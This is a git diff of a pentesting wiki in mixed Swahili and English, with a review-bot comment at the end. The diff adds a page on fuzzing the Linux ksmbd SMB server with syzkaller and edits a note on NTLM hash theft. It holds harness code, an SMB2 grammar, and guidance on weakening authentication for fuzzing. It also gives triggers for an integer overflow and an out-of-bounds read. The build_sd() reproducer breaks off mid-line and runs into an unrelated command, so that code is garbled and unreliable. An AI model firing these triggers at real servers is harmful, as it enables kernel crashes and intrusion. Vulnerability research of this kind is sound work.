http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>) @@ -454,7 +461,7 @@ Ambazo zinatumika na baadhi ya vivinjari na zana (kama Skype) ## NTLM Theft -Kama vile SMB Trapping, kupanda faili zenye madhara kwenye mfumo wa lengwa (kupitia SMB, kwa mfano) kunaweza kusababisha jaribio la uthibitishaji wa SMB, kuruhusu hash ya NetNTLMv2 kukamatwa kwa zana kama Responder. Hash hiyo inaweza kisha kufichuliwa nje ya mtandao au kutumika katika [SMB relay attack](#smb-relay-attack). +Kama kwa SMB Trapping, kuwekea faili zenye madhara kwenye target system (via SMB, for example) kunaweza kusababisha jaribio la SMB authentication, likiaruhusu NetNTLMv2 hash kukamatwa na zana kama Responder. Hash inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack). [See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft) 
diff --git a/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md b/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md new file mode 100644 index 000000000..b1872af81 --- /dev/null +++ b/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md 
@@ -0,0 +1,219 @@ +# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller) + +{{#include ../../banners/hacktricks-training.md}} + +## Overview +Ukurasa huu unaelezea mbinu za vitendo za kutumia na kufuzz Linux in-kernel SMB server (ksmbd) kwa kutumia syzkaller. Unalenga kupanua attack surface ya protocol kupitia usanidi, kujenga harness ya stateful inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs zenye sarufi sahihi, kuelekeza mutations kwenye njia za msimbo zenye coverage dhaifu, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Wakati utafiti wa awali ulitaja CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na snippet za konkret ambazo unaweza kuiga kwa setup zako. + +Target scope: SMB2/SMB3 over TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness iwe rahisi. + +--- + +## Expand ksmbd Attack Surface via Configuration +Kwa default, setup minimal ya ksmbd inabakia ikiacha sehemu kubwa za server zisijapimwa. Washa vipengele vifuatavyo ili kuendesha server kupitia parsers/handlers zaidi na kufikia njia za msimbo za ndani: + +- Global-level +- Durable handles +- Server multi-channel +- SMB2 leases +- Per-share-level +- Oplocks (on by default) +- VFS objects + +Kuwaweka hivi huongeza utekelezaji katika moduli kama: +- smb2pdu.c (command parsing/dispatch) +- ndr.c (NDR encode/decode) +- oplock.c (oplock request/break) +- smbacl.c (ACL parsing/enforcement) +- vfs.c (VFS ops) +- vfs_cache.c (lookup cache) + +Vidokezo +- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Kagua /etc/ksmbd/ksmbd.conf na sehemu za per-share ili kuanzisha durable handles, leases, oplocks na VFS objects. +- Multi-channel na durable handles hubadilisha state machines na lifetimes, mara nyingi kuibua UAF/refcount/OOB bugs chini ya concurrency. + +--- + +## Authentication and Rate-Limiting Adjustments for Fuzzing +SMB3 inahitaji session halali. 
Kutekeleza Kerberos katika harness hukongeza ugumu, kwa hiyo penda kutumia NTLM/guest kwa fuzzing: + +- Ruhusu guest access na weka map to guest = bad user ili watumiaji wasiojulikana warejewe kwa GUEST. +- Kubali NTLMv2 (tengeneza patch policy ikiwa imezimwa). Hii inafanya handshake iwe rahisi wakati ikifanya exercise code paths za SMB3. +- Ondoa ukaguzi mkali wa credit wakati wa majaribio (post-hardening kwa CVE-2024-50285 ilifanya simultaneous-op crediting kuwa mkali zaidi). Vinginevyo, rate-limits zinaweza kukataa mfululizo wa fuzzed mapema sana. +- Ongeza max connections (mfano, hadi 65536) ili kuepuka kukataliwa mapema wakati wa fuzzing yenye throughput kubwa. + +Tahadhari: Taa marekebisho haya ni kwa ajili ya kuwezesha fuzzing pekee. Usitengeneze deployment na mipangilio hii kwenye uzalishaji. + +--- + +## Stateful Harness: Extract Resources and Chain Requests +SMB ni stateful: maombi mengi yanategemea identifiers zinazorejeshwa na majibu ya awali (SessionId, TreeID, FileID pairs). Harness yako lazima iparse majibu na itumie IDs ndani ya programu ile ile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close). + +Example snippet to process a response buffer (skipping the +4B NetBIOS PDU length) and cache IDs: +```c +// process response. 
does not contain +4B PDU length +void process_buffer(int msg_no, const char *buffer, size_t received) { +uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET)); +switch (cmd_rsp) { +case SMB2_TREE_CONNECT: +if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) +tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET)); +break; +case SMB2_SESS_SETUP: +// first session setup response carries session_id +if (msg_no == 0x01 && received >= SESSION_ID_OFFSET + sizeof(uint64_t)) +session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET)); +break; +case SMB2_CREATE: +if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) { +persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET)); +volatile_file_id = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET)); +} +break; +default: +break; +} +} +``` +Vidokezo +- Weka mchakato mmoja wa fuzzer unaoshirikia authentication/state: utulivu na coverage bora na ksmbd’s global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops async, na rerun ndani. +- reset_acc_state ya majaribio ya Syzkaller inaweza kureset global state lakini inaweza kusababisha slowdown kubwa. Pendelea utulivu na kuzingatia fuzzing badala yake. + +--- + +## Grammar-Driven SMB2 Generation (Valid PDUs) +Tafsiri miundo ya SMB2 kutoka Microsoft Open Specifications kuwa sarufi ya fuzzer ili generator yako itengeneze PDUs halali kimuundo, ambazo zinawafikia dispatchers na IOCTL handlers kwa mfumo. 
+ +Mfano (SMB2 IOCTL request): +``` +smb2_ioctl_req { +Header_Prefix SMB2Header_Prefix +Command const[0xb, int16] +Header_Suffix SMB2Header_Suffix +StructureSize const[57, int16] +Reserved const[0, int16] +CtlCode union_control_codes +PersistentFileId const[0x4, int64] +VolatileFileId const[0x0, int64] +InputOffset offsetof[Input, int32] +InputCount bytesize[Input, int32] +MaxInputResponse const[65536, int32] +OutputOffset offsetof[Output, int32] +OutputCount len[Output, int32] +MaxOutputResponse const[65536, int32] +Flags int32[0:1] +Reserved2 const[0, int32] +Input array[int8] +Output array[int8] +} [packed] +``` +Mtindo huu unalazimisha structure sizes/offsets sahihi na huboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation. + +--- + +## Directed Fuzzing With focus_areas +Tumia syzkaller’s experimental focus_areas kuipa uzito zaidi functions/files maalum ambazo kwa sasa zina coverage dhaifu. Mfano wa JSON: +```json +{ +"focus_areas": [ +{"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0}, +{"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0}, +{"weight": 1.0} +] +} +``` +Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor mbaya yenye dacloffset kubwa kupita kiasi husababisha integer-overflow. 
+ +Mjenzi wa reproducer (minimal Python): +```python +def build_sd(): +import struct +sd = bytearray(0x14) +sd[0x00] = 0x00; sd[0x01] = 0x00 +struct.pack_into(' packets.json +``` + +```python +import json, os +os.makedirs("corpus", exist_ok=True) + +with open("packets.json") as f: +data = json.load(f) +# adjust indexing to your tshark JSON structure +packets = [e["_source"]["layers"]["tcp.payload"] for e in data] + +for i, pkt in enumerate(packets): +pdu = pkt[0] +pdu_size = len(pdu) // 2 # hex string length → bytes +with open(f"corpus/packet_{i:03d}.txt", "w") as f: +f.write( +f"syz_ksmbd_send_req(&(&(0x7f0000000340))=ANY=[@ANYBLOB=\"{pdu}\"], {hex(pdu_size)}, 0x0, 0x0)" +) +``` +Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha mara moja UAFs (mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache. + +--- + +## Sanitizers: Zaidi ya KASAN +- KASAN bado ni chombo kuu cha kugundua heap bugs (UAF/OOB). +- KCSAN mara nyingi hutoa false positives au low-severity data races kwa lengo hili. +- UBSAN/KUBSAN zinaweza kugundua makosa ya declared-bounds ambayo KASAN hupoteza kutokana na semantiki za index za array. Mfano: +```c +id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]); +struct smb_sid { +__u8 revision; __u8 num_subauth; __u8 authority[NUM_AUTHS]; +__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */ +} __attribute__((packed)); +``` +Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogunduliwa na UBSAN’s declared-bounds checks. + +--- + +## Vidokezo kuhusu Throughput na Parallelism +- Mchakato mmoja wa fuzzer (shared auth/state) huwa imara zaidi kwa ksmbd na bado huibua races/UAFs shukrani kwa syzkaller’s internal async executor. +- Kwa VM nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde kwa ujumla. Coverage ya ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c inapatikana, ingawa coverage ya state-transition haionyeshwi ipasavyo na metriksi hizi. 
+ +--- + +## Orodha ya Kivitendo +- Washa durable handles, leases, multi-channel, oplocks, na VFS objects katika ksmbd. +- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa utulivu wa fuzzer. +- Jenga stateful harness inayohifadhi SessionId/TreeID/FileIDs na kuunganisha create → ioctl → close. +- Tumia grammar kwa SMB2 PDUs ili kudumisha uhalali wa muundo. +- Tumia focus_areas kuwekeza zaidi kwenye functions zenye coverage dhaifu (mifano, smbacl.c njia kama smb_check_perm_dacl). +- Changanya na ANYBLOB kutoka kwenye pcaps halisi kuvunja plateaus; pakia seeds na syz-db kwa matumizi tena. +- Endesha kwa KASAN + UBSAN; fanyia triage kwa uangalifu ripoti za UBSAN declared-bounds. + +--- + +## Marejeo +- Doyensec – ksmbd Fuzzing (Part 2): https://blog.doyensec.com/2025/09/02/ksmbd-2.html +- syzkaller: https://github.com/google/syzkaller +- ANYBLOB/anyTypes (commit 9fe8aa4): https://github.com/google/syzkaller/commit/9fe8aa4 +- Async executor change (commit fd8caa5): https://github.com/google/syzkaller/commit/fd8caa5 +- syz-db: https://github.com/google/syzkaller/tree/master/tools/syz-db +- KASAN: https://docs.kernel.org/dev-tools/kasan.html +- UBSAN/KUBSAN: https://docs.kernel.org/dev-tools/ubsan.html +- KCSAN: https://docs.kernel.org/dev-tools/kcsan.html +- Microsoft Open Specifications (SMB): https://learn.microsoft.com/openspecs/ +- Wireshark Sample Captures: https://wiki.wireshark.org/SampleCaptures +- Usomaji wa nyongeza: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mu’s syzkaller notes + +{{#include ../../banners/hacktricks-training.md}}
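Review bot: In the process_buffer() snippet, cmd_rsp is read with u16(buffer + CMD_OFFSET) before anything checks received, although each case below it does bounds-check its own field. Add a guard at the top, for example `if (received < CMD_OFFSET + sizeof(uint16_t)) return;`, so a short or truncated response cannot be over-read by the harness. The SMB2_CREATE case checks only CREATE_VFID_OFFSET + sizeof(uint64_t) and then reads both CREATE_PFID_OFFSET and CREATE_VFID_OFFSET, which is safe only if the persistent ID sits at the lower offset; a comment stating that assumption would help. Separately, the build_sd() reproducer as shown here breaks off at `struct.pack_into('` and runs straight into `packets.json`, so please confirm the committed file carries the complete function, its closing fence and the command that produces packets.json. In the smb_sid example the sub_auth[psid->num_subauth - 1] access line is placed before the struct definition it depends on; putting the struct first would read more clearly.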